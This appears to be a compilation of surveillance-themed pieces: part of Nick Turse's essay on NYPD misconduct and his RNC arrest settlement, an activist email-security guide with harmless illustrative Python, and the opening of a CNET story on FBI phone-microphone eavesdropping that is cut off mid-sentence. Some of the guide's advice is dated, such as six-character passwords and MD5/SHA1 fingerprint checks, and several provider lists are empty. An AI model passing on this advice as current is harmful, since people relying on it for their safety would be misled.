“The city of New York is waging a losing and ill-conceived
battle for overzealous secrecy surrounding nearly 2,000 arrests during
the 2004 Republican National Convention…. Police Commissioner Ray
Kelly seemed to cast an awfully wide and indiscriminate net in seeking
out potential troublemakers. For more than a year before the
convention, members of a police spy unit headed by a former official
of the Central Intelligence Agency infiltrated a wide range of groups…
many of the targets … posed no danger or credible threat.”

The Times concluded that — coupled with Mayor Michael Bloomberg’s
efforts to disrupt and criminalize protest during the convention week
— “police action helped to all but eliminate dissent from New York
City during the Republican delegates’ visit. If that was the goal,
then mission accomplished. And civil rights denied.”

Police Commissioner Kelly had a radically different take on his
department’s conduct. Earlier this year, he claimed that “the
Republican National Convention was perhaps the finest hour in the
history of the New York City Department.”

Police Misconduct: 2007

“Finest” might seem a funny term for the NYPD’s actions, but these
days everyone’s a relativist. In the years since the RNC protests, the
NYPD has been mired in scandal after scandal — from killing unarmed
black men and “violations of civil rights” at the National Puerto
Rican Day Parade to issuing “sweeping generalizations” that lead to
“labeling almost every American Muslim as a potential terrorist.” And,
believe it or not, the racial and political scandals were but a modest
part of the mix. Add to them, killings, sexual assaults, kidnapping,
armed robbery, burglary, corruption, theft, drug-related offenses,
conspiracy — and that’s just a start when it comes to crimes members
of the force have been charged with. It’s a rap sheet fit for Public
Enemy #1, and we’re only talking about the story of the NYPD in the
not-yet-completed year of 2007.

For example, earlier this year a 13-year NYPD veteran was
“arrested on charges of hindering prosecution, tampering with
evidence, obstructing governmental administration and unlawful
possession of marijuana,” in connection with the shooting of another
officer. In an unrelated case, two other NYPD officers were arrested
and “charged with attempted kidnapping, armed robbery, armed burglary
and other offenses.”

In a third case, the New York Post reported that a “veteran NYPD
captain has been stripped of his badge and gun as part of a federal
corruption probe that already has led to the indictment of an Internal
Affairs sergeant who allegedly tipped other cops that they were being
investigated.” And that isn’t the only NYPD cover-up allegation to
surface of late. With cops interfering in investigations of fellow
cops and offering advice on how to deflect such probes, it’s a wonder
any type of wrongdoing surfaces. Yet, the level of misconduct in the
department appears to be sweeping enough to be irrepressible.

For instance, sex crime scandals have embroiled numerous officers
— including one “accused of sexually molesting his young
stepdaughter,” who pled guilty to “a misdemeanor charge of child
endangerment,” and another “at a Queens hospital charged with
possessing and sharing child pornography.” In a third case, a member
of the NYPD’s School Safety Division was “charged with the attempted
rape and sexual abuse of a 14-year-old girl.” In a fourth case, a
“police officer pleaded guilty…. to a grotesque romance with an
infatuated 13-year-old girl.” Meanwhile, an NYPD officer, who molested
women while on duty and in uniform, was convicted of sexual abuse and
official misconduct.

Cop-on-cop sexual misconduct of an extreme nature has also
surfaced…. but why go on? You get the idea. And, if you don’t, there
are lurid cases galore to check out, like the investigation into
“whether [an] NYPD officer who fatally shot his teen lover before
killing himself murdered the boyfriend of a past lover,” or the
officer who was “charged with intentional murder in the shooting death
of his 22-year-old girlfriend.” And don’t even get me started on the
officer “facing charges of conspiracy to distribute narcotics and
conspiracy to commit robberies of drugs and drug proceeds from
narcotics traffickers.”

All of this, and much more, has emerged in spite of the classic
blue-wall-of-silence. It makes you wonder: In the surveillance state
to come, are we going to be herded and observed by New York’s finest?

It’s important to note that all of these cases have begun despite
a striking NYPD culture of non-accountability. Back in August, the New
York Times noted that the “Police Department has increasingly failed
to prosecute New York City police officers on charges of misconduct
when those cases have been substantiated by the independent board that
investigates allegations of police abuse, officials of the board say.”
Between March 1, 2007 and June 30, 2007 alone, the NYPD “declined to
seek internal departmental trials against 31 officers, most of whom
were facing charges of stopping people in the street without probable
cause or reasonable suspicion, according to the city’s Civilian
Complaint Review Board.” An ACLU report, “Mission Failure: Civilian
Review of Policing in New York City, 1994-2006,” released this month,
delved into the issue in even greater detail. The organization found
that, between 2000 and 2005, “the NYPD disposed of substantiated
complaints against 2,462 police officers: 725 received no discipline.
When discipline was imposed, it was little more than a slap on the
wrist.

Much has come to light recently about the way the U.S. military
has been lowering its recruitment standards in order to meet the
demands of ongoing, increasingly unpopular wars in Iraq and
Afghanistan, including an increase in “moral waivers” allowing more
recruits with criminal records to enter the services. Well, it turns
out that, on such policies, the NYPD has been a pioneering force.

In 2002, the BBC reported that “New York’s powerful police union….
accused the police department of allowing ‘sub-standard’ recruits onto
the force.” Then, just months after the RNC protests, the New York
Daily News exposed the department’s practice of “hiring applicants
with arrest records and shoving others through without full background
checks” including those who had been “charged with laundering drug
money, assault, grand larceny and weapons possession.” According to
Sgt. Anthony Petroglia, who, until he retired in 2002, had worked for
almost a decade in the department’s applicant-processing division, the
NYPD was “hiring people to be cops who have no respect for the law.”
Another retiree from the same division was blunter: “It’s all judgment
calls — bad ones…. but the bosses say, ‘Send ’em through. We’ll
catch the problem ones later.'”

The future looks bright, if you are an advocate of sending the
force even further down this path. The new choice to mold the
department of tomorrow, according to the Village Voice, the “NYPD’s
new deputy commissioner of training, Wilbur ‘Bill’ Chapman, should
have no trouble teaching ‘New York’s Finest’ about the pitfalls of
sexual harassment, cronyism, and punitive transfers [because h]e’s
been accused of all that during his checkered career.”

In the eerie afterglow of 9/11, haunted by the specter of
terrorism, in an atmosphere where repressive zero-tolerance policies
already rule, given the unparalleled power of Commissioner Kelly —
called “the most powerful police commissioner in the city’s history”
by NYPD expert Leonard Levitt — and with a police department largely
unaccountable to anyone (as the only city agency without any effective
outside oversight), the Escape from New York model may indeed
represent Manhattan’s future.

Nick Turse v. The City of New York

So what, you might still be wondering, was it that led the
security official at the federal courthouse to raise the specter of my
imminent demise? A weapon? An unidentified powder? No, a digital audio
recorder. “Some people here don’t want to be recorded,” he explained
in response to my quizzical look.

So I checked the recording device and, accompanied by my lawyer,
the indomitable Mary D. Dorman, made my way to Courtroom 18D, a
stately room in the upper reaches of the building that houses the
oldest district court in the nation. There, I met our legal nemesis, a
city attorney whose official title is “assistant corporation counsel.”
After what might pass for a cordial greeting, he asked relatively
politely whether I was going to accept the city’s monetary offer of
$8,500 — which I had rejected the previous week — to settle my
lawsuit for false arrest. As soon as I indicated I wouldn’t (as I had
from the moment the city started the bidding at $2,500), any hint of
cordiality fled the room. Almost immediately, he was referring to me
as a “criminal” — declassified NYPD documents actually refer to me as
a “perp.” Soon, he launched into a bout of remarkable bluster,
threatening lengthy depositions to waste my time and monetary
penalties associated with court costs that would swallow my savings.

Then, we were all directed to a small jury room off the main
courtroom, where the city’s attorney hauled out a threatening prop to
bolster his act — an imposingly gigantic file folder stuffed with
reams of “Nick Turse” documents, including copies of some of my
disreputable Tomdispatch articles as well as printouts of suspicious
webpages from the American Empire Project — the obviously criminal
series that will be publishing my upcoming book, The Complex.

There, the litany of vague threats to tie me down with
depositions, tax me with fees, and maybe, somehow, send me to jail for
a “crime” that had been dismissed years earlier continued until a
federal magistrate judge entered the room. To him, the assistant
corporation counsel and I told our versions of my arrest story —
which turned out to vary little.

The basic details were the same. As the city attorney shifted in
his seat, I told the judge how, along with compatriots I’d met only
minutes before, I donned my “WAR DEAD” sign and descended into the
subway surrounded by a phalanx of cops — plainclothes, regular
uniformed, Big Brother-types from the Technical Assistance Response
Unit (TARU), and white-shirted brass, as well as a Washington Post
photographer and legal observers from the National Lawyers Guild —
and boarded our train. I explained that we sat there looking as dead
as possible for about 111 blocks and then, as the Washington Post
reported, were arrested when we came back to life and “tried to change
trains.” I asked, admittedly somewhat rhetorically, why, if I was such
a “criminal,” none of the officers present at my arrest had actually
showed up in court to testify against me when my case was dismissed
out of hand back in 2004? And why hadn’t the prosecutor wanted to
produce the video footage the NYPD had taken of the entire action and
my arrest? And why had the city been trying to buy me off all these
years since?

Faced with the fact that his intimidation tactics hadn’t worked,
the city attorney now quit his bad-cop tactics and I rose again out of
the ditch of “common criminality” into citizenship and then to the
high status of being addressed as “Dr. Turse” (in a bow to my PhD).
Offers and counteroffers followed, leading finally to a monetary
settlement with a catch — I also wanted an apology. If that guard
hadn’t directed me — under threat of being shot — to check my
digital audio recorder at the door, I might have had a sound file of
it to listen to for years to come. Instead, I had to be content with
the knowledge that an appointed representative of the City of New York
not only had to ditch the Escape from New York model — at least for a
day — and pony up some money for violating my civil rights, but also,
before a federal magistrate judge, issue me an apology, on behalf of
the city, for wrongs committed by the otherwise largely unaccountable
NYPD.

The Future of the NYPD and the Homeland-Security State-let

I’m under no illusions that this minor monetary settlement and
apology were of real significance in a city where civil rights are
routinely abridged, the police are a largely unaccountable armed
force, and a culture of total surveillance is increasingly the norm.
But my lawsuit, when combined with those of my fellow arrestees, could
perhaps have some small effect. After all, less than a year after the
convention, 569 people had already “filed notices that they intended
to sue the City, seeking damages totaling $859,014,421,” according to
an NYCLU report. While the city will end up paying out considerably
less, the grand total will not be insignificant. In fact, Jim Dwyer
recently reported that the first 35 of 605 RNC cases had been settled
for a total of $694,000.

If New Yorkers began to agitate for accountability — demanding,
for instance, that such settlements be paid out of the NYPD’s budget
— it could make a difference. Then, every time New Yorkers’ hard-
earned tax-dollars were handed over to fellow citizens who were
harassed, mistreated, injured, or abused by the city’s police force
that would mean less money available for the “big expensive toys” that
the “big boys” of the NYPD’s aviation unit use to record the private
moments of unsuspecting citizens or the ubiquitous surveillance gear
used to capture the rest of the city on candid camera. It wouldn’t
put an end to the NYPD’s long-running criminality or the burgeoning
homeland security state-let that it’s building, but it would, at
least, introduce a tiny measure of accountability.

Such an effort might even begin a dialogue about the NYPD, its
dark history, its current mandate under the Global War on Terror, and
its role in New York City. For instance, people might begin to examine
the very nature of the department. They might conclude that questions
must be raised when institutions — be they rogue regimes, deleterious
industries, unaccountable corporations, or fundamentally-tainted
government institutions — consistently, over many decades, evidence a
persistent disregard for the law, a lack of accountability, and a deep
resistance to reform. Those directly affected by the NYPD, a nearly
38,000-person force — larger than many armies — that has
consistently flouted the law and has proven remarkably resistant to
curtailing its own misconduct for well over a century, might even
begin to wonder if it can be trusted to administer the homeland
security state-let its top officials are fast implementing and, if
not, what can be done about it.


Nick Turse is the associate editor and research director of
Tomdispatch.com. He has written for the Los Angeles Times, the San
Francisco Chronicle, the Nation, the Village Voice, and regularly for
Tomdispatch.com. His first book, The Complex, an exploration of the
new military-corporate complex in America, is due out in the American
Empire Project series by Metropolitan Books in 2008. His new website
(up only in rudimentary form) will fully launch in the coming months.

Why security matters

Every email takes a perilous journey. A typical email might travel
across twenty networks and be stored on five computers from the time
it is composed to the time it is read. At every step of the way, the
contents of the email might be monitored, archived, cataloged, and
searched.

However, it is not the content of your email which is most
interesting: typically, a spying organization is more interested in
whom you communicate with. There are many ways in which this kind of
mapping of people’s associations and habits is far worse than
traditional eavesdropping. By cataloging our associations, a spying
organization has an intimate picture of how our social movements are
organized–a more detailed picture than even the social movements
themselves are aware of.
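
To make the point concrete, the kind of association map described above can be built from header metadata alone, with no access to message bodies. The sketch below is illustrative only — the addresses and the log format are invented — but it shows how little work is needed to turn a pile of (sender, recipient) records into a map of who talks to whom, and how often:

```python
from collections import Counter

# Hypothetical metadata log: (sender, recipient) pairs harvested from
# email headers alone. No message content is needed for this analysis.
metadata_log = [
    ("alice@example.org", "bob@example.org"),
    ("alice@example.org", "bob@example.org"),
    ("alice@example.org", "carol@example.org"),
    ("bob@example.org", "carol@example.org"),
]

def association_map(log):
    """Count how often each unordered pair of addresses communicates."""
    pairs = Counter()
    for sender, recipient in log:
        # frozenset treats alice->bob and bob->alice as the same link
        pairs[frozenset((sender, recipient))] += 1
    return pairs

links = association_map(metadata_log)
# In this toy graph the strongest link is alice <-> bob (2 messages).
strongest = max(links, key=links.get)
print(sorted(strongest), links[strongest])
```

Scaled up from four log lines to an ISP’s entire mail traffic, the same counting exercise yields exactly the detailed picture of a social movement’s structure that the paragraph above warns about.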

This is bad. Really bad. The US government, among others, has a long
track record of doing whatever it can to subvert, imprison, kill, or
squash social movements which it sees as a threat (black power, anti-
war, civil rights, anti-slavery, native rights, organized labor, and
so on). And now they have all the tools they need to do this with
blinding precision.

We believe that communication free of eavesdropping and association
mapping is necessary for a democratic society (should one ever happen
to take root in the US). We must defend the right to free speech, but
it is just as necessary to defend the right to private speech.

Unfortunately, private communication is not possible if only a few
people practice it: they will stand out and open themselves up to
greater scrutiny. Therefore, we believe it is important for everyone
to incorporate as many security measures into your email life as you
are able.

Email is not secure

You should think of normal email as a postcard: anyone can read it,
your letter carrier, your nosy neighbor, your house mates. All email,
unless encrypted, is completely insecure. Email is actually much less
secure than a postcard, because at least with a postcard you have a
chance of recognizing the sender’s handwriting. With email, anyone can
pretend to be anyone else.

There is another way in which email is even less private than a
postcard: the government does not have enough labor to read everyone's
postcards, but it probably has the capacity to scan most email. Based
on current research in data mining, it is likely that the government
does not search email for particular words but rather looks for
patterns of association and activity.

In the cases below, well-established evidence shows that the
government conducts widespread and sweeping electronic surveillance.

full-pipe monitoring
According to a former Justice Department attorney, it is common
practice for the FBI to engage in "full-pipe monitoring": vacuuming up
all the traffic of an ISP and then later mining that data for whatever
the FBI might find interesting. The story was first reported on
January 30, 2007 by Declan McCullagh of CNET

AT&T

The Electronic Frontier Foundation (EFF) filed a class-action
lawsuit against AT&T on January 31, 2006, accusing the telecom giant
of violating the law and the privacy of its customers by collaborating
with the National Security Agency (NSA) in its massive and illegal
program to wiretap and data-mine Americans' communications.

Because AT&T is one of the few providers of the internet backbone
(a so-called Tier 1 provider), even if you are not an AT&T customer it
is likely that AT&T is the carrier for much of your internet traffic.
It is very likely that other large internet and email providers have
also worked out deals with the government. We only know about this one
because of an internal whistleblower.

Carnivore

For legal domestic wiretaps, the U.S. government runs a program
called Carnivore (also called DCS1000).

Carnivore is a 'black box' which some ISPs are required to install
and which allows law enforcement to do 'legal' wiretaps. However, no
one knows how these boxes work, they effectively give the government
total control over monitoring anything on the ISP's network, and there
is much evidence that the government uses Carnivore to gather more
information than is legal.

As of January 2005, the FBI announced that it is no longer using
Carnivore/DCS1000 and is replacing it with a product developed by a
third party. The purpose of the new system is exactly the same.

ECHELON

ECHELON is a spy program operated cooperatively by the
governments of the United States, Canada, the United Kingdom,
Australia, and New Zealand. The goal is to monitor and analyze
internet traffic on a wide scale. The EU Parliament has accused the
U.S. of using ECHELON for industrial espionage.

Call database

On May 10, 2006, USA Today broke the story that the NSA has a database
designed to track every phone call ever made in the US. Although this
applies to phone conversations, the fact that the government believes
that this is legal means that it almost certainly thinks it is legal
to track all the email communication within the US as well. And we
know from the AT&T case that it has the capability to do so.

You can do something about it!

What a gloomy picture! Happily, there are many things you can do.
These security pages will help outline some of the simple and not-so-
simple changes you can make to your email behavior.

* Secure Connections: by using secure connections, you protect
your login information and your data while it is in transport to the
server.
* Secure Providers: when you send mail to and from secure email
providers, you can protect the content of your communication and also
the pattern of your associations.
* Public Key Encryption: although it is a little more work, public
key encryption is the best way to keep the content of your
communication private.

See the next page, Security Measures, for tips on these and other
steps you can take. Remember: even if you don’t personally need
privacy, practicing secure communication will ensure that others have
the ability to freely organize and agitate.

Practice secure behavior!
These pages include a lot of fancy talk about encryption. Ultimately,
however, all this whizbang crypto-alchemy will be totally useless if you
have insecure behavior. A few simple practices will go a long way
toward securing your communications:

1. Logout: make sure that you always log out when using web-mail.
This is very important, and very easy to do. It is particularly
important when using a public computer.
2. Avoid public computers: this can be difficult. If you do use a
public computer, consider changing your password often, or use the
virtual keyboard link (if your web-mail provider offers one).
3. Use good password practice: you should change your password
periodically and use a password which is at least 6 characters long
and contains a combination of numbers, letters, and symbols. It is
better to use a complicated password and write it down than to use a
simple password and keep it only in your memory. Studies show that
most people use passwords which are easy to guess or to crack,
especially when the attacker has some information about the interests
of the person. You should never pick a password which is found in the
dictionary (the same goes for "love" as well as "10v3" and other
common ways of replacing letters with numbers).
4. Be a privacy freak: don’t tell other people your password. Also,
newer operating systems allow you to create multiple logins which keep
user settings separate. You should enable this feature, and logout or
“lock” the computer when not in use.
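As an illustration of the password rules above (minimum length, a mix
of character classes, and rejecting dictionary words even after undoing
letter-for-number swaps), here is a minimal Python sketch. The tiny
word list is a stand-in for a real dictionary, not a real checker:

```python
import re

# Stand-in for a real dictionary wordlist.
COMMON_WORDS = {"love", "password", "secret", "letmein"}

# Undo common letter-for-number substitutions: "10v3" -> "love".
LEET = str.maketrans("013457@$", "oleastas")

def is_weak(password):
    # Rule 1: at least 6 characters.
    if len(password) < 6:
        return True
    # Rule 2: must mix letters, numbers, and symbols.
    if not all(re.search(p, password)
               for p in (r"[A-Za-z]", r"\d", r"[^A-Za-z0-9]")):
        return True
    # Rule 3: reject dictionary words, even disguised ones like "10v3!!".
    stripped = re.sub(r"[^A-Za-z0-9]", "", password.lower()).translate(LEET)
    return stripped in COMMON_WORDS

print(is_weak("10v3"))      # True: too short
print(is_weak("10v3!!"))    # True: just "love" in disguise
print(is_weak("k7#pq2Vx"))  # False: long, mixed, not a dictionary word
```

A real checker would use a full wordlist and an entropy estimate, but
the logic is the same: length, variety, and no guessable words.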

Use secure connections!
What are secure connections?

When you check your mail from the server, you can use an
encrypted connection, which adds a high level of security to all
traffic between your computer and the server. Secure connections are
enabled for web-mail and for IMAP or POP mail clients.

This method is useful for protecting your password and login. If you
don’t use a secure connection, then your login and password are sent
over the internet in a ‘cleartext’ form which can be easily
intercepted. It is obvious why you might not want your password made
public, but it may also be important to keep your login private in
cases where you do not want your real identity tied to a particular
email account.

How do I know if I am using a secure connection?

When using a web browser (Firefox, Safari, etc.)
If you are using a web browser to connect to Riseup, there are three
things you can check to see if you are using a secure connection.

The first is easy: are you using Internet Explorer? If so, switch to
Firefox. The security problems with Internet Explorer are too numerous
to mention and making the switch to Firefox is an easy step in the
right direction.

Secondly, look at the URL bar, where the address is. If the address
starts with “https://” (NOTE the ‘s’), then you have a secure
connection; if it is just “http://” (NO ‘s’), then you are not using a
secure connection. You can change that “http” to “https” by clicking
on the URL bar, adding the ‘s’, and then hitting Enter to load the
page securely.

The third way to tell is by looking for a little padlock icon. It will
appear either in the URL location bar or in the bottom corner of the
window, and it should appear locked. If the lock doesn't exist, or the
lock picture looks like it is unlocked, you are not using a secure
connection. You can hover your mouse over the padlock to get more
information, and often clicking (or sometimes right-clicking) on the
lock will bring up details about the SSL certificate used to secure
the connection.

If you click on the padlock, you can verify Riseup's certificate
fingerprints. This is a very good idea! Follow these directions to
verify our fingerprint.

When using a mail client (Thunderbird, Outlook, etc.)
For POP and IMAP, your mail client will have the option of enabling
SSL or TLS. For sending mail (SMTP), both SSL and TLS will work, but
some ISPs will block TLS, so you might need to use SSL. For more
specific, step-by-step configurations for your mail client, see our
mail client tutorials and SMTP FAQ.
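The same settings can be sketched programmatically. In this minimal
Python example (the hostname mail.example.org is hypothetical;
substitute your provider's actual servers), IMAP over SSL on port 993
is encrypted from the first byte, while SMTP submission on port 587
starts in cleartext and upgrades with STARTTLS before the login is
sent:

```python
import imaplib
import smtplib
import ssl

def open_imap_ssl(host, user, password):
    # IMAP over SSL (port 993): the whole session is encrypted from the start.
    ctx = ssl.create_default_context()  # verifies the server's certificate
    conn = imaplib.IMAP4_SSL(host, imaplib.IMAP4_SSL_PORT, ssl_context=ctx)
    conn.login(user, password)
    return conn

def open_smtp_starttls(host, user, password):
    # SMTP submission (port 587): starts in cleartext, then upgrades via
    # STARTTLS so the login and password are only sent over the encrypted link.
    ctx = ssl.create_default_context()
    conn = smtplib.SMTP(host, 587)
    conn.starttls(context=ctx)
    conn.login(user, password)
    return conn

# Usage (hypothetical hostname and credentials; requires network access):
# imap = open_imap_ssl("mail.example.org", "alice", "s3cret!pw")
# smtp = open_smtp_starttls("mail.example.org", "alice", "s3cret!pw")
```

Either way, the connection between you and your provider is encrypted;
the difference is only whether encryption starts immediately or after
an explicit upgrade.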

The limits of secure connections

The problem with email is that it takes a long and perilous journey.
When you send a message, it first travels from your computer to the mail server and then is delivered to the recipient's mail
server. Finally, the recipient logs on to check their email and the
message is delivered to their computer.

Using secure connections only protects your data as it travels from
your computer to the servers (and vice versa). It does
not make your email any more secure as it travels around the internet
from mail server to mail server. To do this, see below.

Use secure email providers
What is StartTLS?

There are many governments and corporations who “sniff” general
traffic on the internet. Even if you use a secure connection to check
and send your email, the communication between mail servers is almost
always insecure and out in the open.

Fortunately, there is a solution! StartTLS is a fancy name for a very
important idea: StartTLS allows mail servers to talk to each other in
a secure way.

If you and your friends use only email providers which use StartTLS,
then all the mail traffic among you will be encrypted while in
transport. If both sender and recipient also use secure connections
while talking to the mail servers, then your communications are likely
secure over their entire lifetime.

We will repeat that because it is important: to gain any benefit from
StartTLS, both sender and recipient must be using StartTLS enabled
email providers. For mailing lists, the list provider and each and
every list subscriber must use StartTLS.
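You can check for yourself whether a mail server advertises StartTLS:
connect to its SMTP port, introduce yourself with EHLO, and look for
STARTTLS among the advertised extensions. A small Python sketch (the
hostname is a hypothetical example):

```python
import smtplib

def offers_starttls(mx_host):
    # Connect to the server's SMTP port, say EHLO, and check whether
    # STARTTLS is among the extensions the server advertises.
    with smtplib.SMTP(mx_host, 25, timeout=10) as server:
        server.ehlo()
        return server.has_extn("starttls")

# Usage (hypothetical mail server; requires network access):
# print(offers_starttls("mx.example.org"))
```

Note that an advertisement is not a guarantee: a server may offer
STARTTLS yet fall back to cleartext if the other side declines, which
is why public-key encryption (below) is the only end-to-end assurance.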

Which email providers use StartTLS?
Currently, these tech collectives are known to use StartTLS:


We recommend that you and all your friends get email accounts with
these tech collectives!
Additionally, these email providers often have StartTLS enabled:

* universities:,,,,,,,,,,,,,,,,,,,
* organizations:,
* companies:,,,,,,,,, greennet (

What are the advantages of StartTLS?
This combination of secure email providers and secure connections has
many advantages:

* It is very easy to use! No special software is needed. No
special behavior is needed, other than to make sure you are using
secure connections.
* It prevents anyone from creating a map of whom you are
communicating with and who is communicating with you (so long as both
parties use StartTLS).
* It ensures that your communication is pretty well protected.
* It promotes the alternative mail providers which use StartTLS.
The goal is to create a healthy ecology of activist providers–which
can only happen if people show these providers strong support. Many of
these alternative providers also incorporate many other important
security measures, such as limited logging and encrypted storage.

What are the limitations of StartTLS?
However, there are some notable limitations:

* Your computer is a weak link: your computer can be stolen or
hacked into, or have keylogging software or hardware installed.
* It is difficult to verify: for a particular message to be
secure, both the origin and destination mail providers must use
StartTLS (and both the sender and recipient must use encrypted
connections). Unfortunately, it is difficult to confirm that all of
this happened. For this, you need public key encryption (see below).

Use public-key encryption
If you wish to keep the contents of your email private, and confirm
the identity of people who send you email, you should download and
install public-key encryption software. This option is only available
if you have your own computer.

Public-key encryption uses a combination of a private key and a public
key. The private key is known only by you, while the public key is
distributed far and wide. To send an encrypted message to someone, you
encrypt the message with their public key. Only their private key will
be able to decrypt your message and read it.
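The mathematics behind this can be illustrated with a toy RSA example
in Python. The primes here are absurdly small so the arithmetic is
visible; real keys are thousands of bits with padding, and you should
use GPG, never code like this, for actual mail:

```python
def make_keys(p=61, q=53, e=17):
    # p and q are secret primes; n = p*q becomes the public modulus.
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)      # private exponent: e*d == 1 (mod phi); Python 3.8+
    return (e, n), (d, n)    # (public key, private key)

def encrypt(message, public_key):
    # Anyone holding the public key can encrypt.
    e, n = public_key
    return pow(message, e, n)

def decrypt(ciphertext, private_key):
    # Only the private key can undo it.
    d, n = private_key
    return pow(ciphertext, d, n)

public, private = make_keys()
c = encrypt(42, public)
print(decrypt(c, private))   # prints 42: the private key recovers the message
```

The point of the demonstration: encryption uses only the public half,
so the public key can be handed out freely without weakening security.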

The universal standard for public-key email encryption is OpenPGP,
implemented by both Pretty Good Privacy (PGP) and GNU Privacy Guard
(GPG). GPG is Free Software, while PGP is a proprietary product
(although there are many freeware versions available). The two work
interchangeably and are available as convenient add-ons to mail
clients for Linux, Mac, and Windows.

For information on configuring your mail client to use public-key
encryption, see our mail client tutorial pages. In particular, see the
tutorials for Apple Mail and Thunderbird. Otherwise, you should refer
to the documentation which comes with your particular mail client.

Although it provides the highest level of security, public-key
encryption is still an adventure to use. To make your journey less
scary, we suggest you keep these things in mind:

* Be in it for the long haul: using public-key encryption takes a
commitment to learning a lot of new skills and jargon. The widespread
adoption of GPG is a long way off, so it may seem like a lot of work
for not much benefit. However, we need early adopters who can help
build a critical mass of GPG users.
* Develop GPG buddies: although most of your traffic might not be
encrypted, if you find someone else who uses GPG, try to make a
practice of communicating with that person using only GPG.
* Look for advocates: people who use GPG usually love to
evangelize about it and help others to use it too. Find someone like
this who can answer your questions and help you along.

Although you can hide the contents of email with public-key
encryption, it does not hide who you are sending mail to and receiving
mail from. This means that even with public key encryption there is a
lot of personal information which is not secure.

Why? Imagine that someone knew nothing of the content of your mail
correspondence, but they knew who you sent mail to and received mail
from and they knew how often and what the subject line was. This
information can provide a picture of your associations, habits,
contacts, interests and activities.

The only way to keep your list of associations private is to use an
email provider which will establish a secure connection with other
email providers. See Use secure email providers, above.

What are certificates?

On the internet, a public key certificate is needed in order to verify
the identity of people or computers. These certificates are also
called SSL certificates or identity certificates. We will just call
them “certificates.”

In particular, certificates are needed to establish secure
connections. Without certificates, you would be able to ensure that no
one else was listening, but you might be talking to the wrong computer
altogether! All our servers and all our services allow or require
secure connections. It can sometimes be tricky to coax a particular
program to play nice and recognize our certificates. This page will
help you through the process.

If you don't follow these steps, your computer will likely complain or
fail every time you attempt to create a secure connection with our
servers.

What is a certificate authority?
Certificates are the digital equivalent of a government issued
identification card. Certificates, however, are issued by private
corporations called certificate authorities (CA).

I thought you were against authority?
We are, but the internet is designed to require certificate
authorities and there is not much we can do about it. There are other
models for encrypted communication, such as the decentralized notion
of a “web of trust” found in PGP. Unfortunately, no one has written
any web browsers or mail clients to use PGP for establishing secure
connections, so we are forced to rely on certificate authorities. Some
day, we hope to collaborate with other tech collectives to create a
certificate (anti) authority.

The certificate is not recognized – what should I do?
We recently installed new certificates that should solve this issue
for webmail and mail client users. However, users accessing the secure
pages for some of our other services will still receive this annoying
error message. The problem is that those servers use a CAcert root
certificate, which is not on the list of "trusted" certificate
authorities. So, in order to use the certificates without receiving
the error message, you will need to import the CAcert root
certificate.

What are the fingerprints of’s certificates?
Some programs cannot use certificate authorities to confirm the
validity of a certificate. In that case, you may need to manually
confirm the fingerprint of the certificate. Here are some
fingerprints for various certificates:


1. SSL fingerprint for
* sha1: BA:73:F5:45:E0:98:54:E5:6D:BA:5C:4B:98:EF:1A:A9:4B:C1:47:9D
* md5:  88:12:94:4D:D5:43:FE:22:84:4E:67:C9:0C:1E:DC:DA

2. SSL fingerprint for
* sha1: F2:1D:DC:23:89:36:15:F9:1B:2C:66:F0:93:99:6E:C8:EB:2C:43:BB
* md5:  A1:3E:38:19:39:70:DA:F0:0E:B1:58:D9:1A:67:41:AD

3. SSL fingerprint for
* sha1: 13:C8:86:19:53:52:C7:A1:B8:03:B0:53:1A:E9:DA:FF:AD:A9:BB:24
* md5:  84:32:84:43:81:13:16:56:0F:CE:68:A9:CF:29:4D:8D


When should I verify these fingerprints?
You should verify these fingerprints whenever they change, or whenever
you are using a computer that you do not control (such as at an
internet cafe or a library). If you have any reason to be suspicious,
learn how to verify the fingerprints and do it often.

How do I verify these fingerprints?
To verify these fingerprints, you need to look at what your browser
believes the fingerprints are for the certificates and compare them to
what is listed above. If they are different, there is a problem.

In most browsers, the way you look at the fingerprints of the
certificate that you were given is by clicking on the lock icon that
is located either in the URL location bar, or in the bottom corner of
your browser. This should bring up details about the certificate being
used, including the fingerprint. Some browsers may show only the MD5
fingerprint or only the SHA1 fingerprint; some will show both. Usually
one is good enough to verify the validity of the fingerprint.
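Fingerprint checking can also be done outside the browser. This Python
sketch fetches a server's certificate and formats its SHA-1
fingerprint in the same colon-separated style as the values published
above (the hostname is a hypothetical example):

```python
import hashlib
import ssl

def format_fingerprint(der_bytes):
    # SHA-1 of the DER-encoded certificate, as colon-separated hex pairs,
    # matching the "BA:73:F5:..." style shown in published fingerprints.
    digest = hashlib.sha1(der_bytes).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

def cert_fingerprint(host, port=443):
    # Fetch the certificate the server actually presents, then compute
    # its fingerprint to compare by hand against the published value.
    pem = ssl.get_server_certificate((host, port))
    return format_fingerprint(ssl.PEM_cert_to_DER_cert(pem))

# Usage (hypothetical host; requires network access):
# print(cert_fingerprint("mail.example.org"))
```

If the computed value differs from the published one, someone may be
intercepting the connection, which is exactly what this check exists
to catch.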

I want to learn more

Great! This is an important topic, and we encourage you to read this
piece, which clearly articulates in a non-technical way the problems
with certificate authorities and outlines some interesting suggestions
for ways that the existing architecture and protocols can be tweaked
just a little to change the situation for the better.


Policy at
We strive to keep our mail as secure and private as we can.

* We do not log your IP address. (Most services keep detailed
records of every machine which connects to the servers. We keep only
information which cannot be used to uniquely identify your machine.)
* All your data, including your mail, is stored in encrypted form.
* We work hard to keep our servers secure and well defended
against any malicious attack.
* We do not share any of our user data with anyone.
* We will actively fight any attempt to subpoena or otherwise
acquire any user information or logs.
* We will not read, search, or process any of your incoming or
outgoing mail, other than by automatic means to protect you from
viruses and spam, or when directed to do so by you.



Security resources for activists

This site contains a quick overview of email security. For more in-
depth information, check out these websites:
Helping activists stay safe in our oppressive world.
A series of briefings on information security and online safety for
civil society organizations.
Guide to Email Security Using Encryption and Digital Signatures
Computer Security for the Average Activist
An introduction to activism on the internet


FBI taps cell phone mic as eavesdropping tool
By Anne Broache and Declan McCullagh  /  December 1, 2006

The FBI appears to have begun using a novel form of electronic
surveillance in criminal investigations: remotely activating a mobile
phone’s microphone and using it to eavesdrop on nearby conversations.

The technique is called a “roving bug,” and was approved by top U.S.
Department of Justice officials for use against members of a New York
organized crime family who were wary of conventional surveillance
techniques such as tailing a suspect or wiretapping him.

Nextel cell phones owned by two alleged mobsters, John Ardito and his
attorney Peter Peluso, were used by the FBI to listen in on nearby
conversations. The FBI views Ardito as one of the most powerful men in
the Genovese family, a major part of the national Mafia.

The surveillance technique came to light in an opinion published this
